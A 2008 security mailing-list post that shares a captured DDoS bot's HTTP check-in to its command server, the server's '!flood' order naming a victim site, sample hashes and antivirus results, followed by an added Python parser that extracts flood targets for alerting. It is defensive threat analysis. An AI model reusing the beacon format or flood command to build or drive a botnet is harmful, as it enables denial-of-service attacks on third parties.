[nsp-sec] another ddos bot

Jose Nazario jose at arbor.net
Thu May 8 13:17:39 EDT 2008


this one looks like IRC-style ddos commands over HTTP:

URL: http://netcoders.ne.funpic.de/b/stat.php

SEND:
POST /b/stat.php HTTP/1.1
Host: netcoders.ne.funpic.de
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

nick=zdzwlmrgjlndiha&info=PC: flash1 at OS: Windows XP at Memory: 147/255MB at CPU:3057MHz with 1 core(s)@Uptime: 0 days 0 hours 2 minute at Bot version:1.07@&last=

RECIEVE: HTTP/1.1 200 OK
Set-Cookie: cken=1210250987; path=/; domain=.funpic.de
Date: Thu, 08 May 2008 12:49:47 GMT
Transfer-Encoding: chunked
Connection: close
X-Pad: avoid browser bug
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=10, max=1000

38
!flood mass www.battleapps.com 80 /forum/index.php 8 250
0



about that sample:

MD5: 0cec1700336c11a7089d076b1ac43b79
SHA1: 36b57200ecaef36691148e804468d202bb84c628
File type: application/x-ms-dos-executable
File size: 12288 bytes

A/V INFO:
-----------------------------------------------
SCANNER: VScanner                      VIRUS: Unknown, file is "suspicious"
SCANNER: AVG                           VIRUS: No virus found.
SCANNER: ClamAV                        VIRUS: No virus found.
SCANNER: BDC                           VIRUS: No virus found.
-----------------------------------------------


i don't think i have any more of these in my repo at this time.

-------------------------------------------------------------
jose nazario, ph.d.     <jose at arbor.net>
security researcher, office of the CTO,  arbor networks
v: (734) 821 1427 	      http://asert.arbornetworks.com/
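Added example, not code from the original post: a small Python triage parser for the two halves of the exchange above. It dechunks the HTTP response and pulls out any IRC-style `!command` line, and it splits the beacon's `info` field into properties (the list archive rendered `@` as ` at ` in places, so both are treated as separators). The sample bodies are constructed from the quoted capture; the meaning of the trailing numeric arguments (`8 250`) is not stated in the post and is kept as opaque extras.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Constructed from the capture quoted above (not a live capture).
BEACON_BODY = ("nick=zdzwlmrgjlndiha&info=PC: flash1 at OS: Windows XP at Memory: 147/255MB"
               " at CPU:3057MHz with 1 core(s)@Uptime: 0 days 0 hours 2 minute"
               " at Bot version:1.07@&last=")
# 0x38 = 56 bytes, exactly the length of the command line in the capture.
CHUNKED_BODY = (b"38\r\n!flood mass www.battleapps.com 80 /forum/index.php 8 250\r\n"
                b"0\r\n\r\n")

CMD_RE = re.compile(r"^!(?P<name>\w+)(?:\s+(?P<args>\S.*))?$")


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; stops at the 0-length chunk."""
    out, pos = b"", 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            return out  # truncated body: return what was recovered
        size = int(body[pos:nl].split(b";")[0].strip() or b"0", 16)
        pos = nl + 2
        if size == 0:
            return out
        out += body[pos:pos + size]
        pos += size + 2  # skip chunk data plus its trailing CRLF


def parse_beacon(body: str) -> dict:
    """Split the bot's check-in into nick and 'Key: value' properties."""
    fields = parse_qs(body, keep_blank_values=True)
    info = fields.get("info", [""])[0]
    props = {}
    # Assumption: '@' is the real separator; ' at ' is the archive's rewrite of it.
    for part in re.split(r"@| at ", info):
        if part.strip():
            key, _, val = part.partition(":")
            props[key.strip()] = val.strip()
    return {"nick": fields.get("nick", [""])[0], "props": props}


def extract_commands(dechunked: bytes) -> list:
    """Return every IRC-style '!name args' line found in a response body."""
    found = []
    for line in dechunked.decode("latin-1").splitlines():
        m = CMD_RE.match(line.strip())
        if m:
            found.append({"name": m.group("name"), "args": (m.group("args") or "").split()})
    return found


def describe_flood(cmd: dict) -> Optional[dict]:
    """Pull the target out of a '!flood <mode> <host> <port> <path> ...' command."""
    if cmd["name"] != "flood" or len(cmd["args"]) < 4:
        return None
    mode, host, port, path = cmd["args"][:4]
    return {"mode": mode, "host": host, "port": int(port), "path": path, "extra": cmd["args"][4:]}
```

Running `describe_flood` over `extract_commands(dechunk(CHUNKED_BODY))` yields the victim host, port and path from the captured command, which is the piece worth alerting on or blocking at the proxy.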
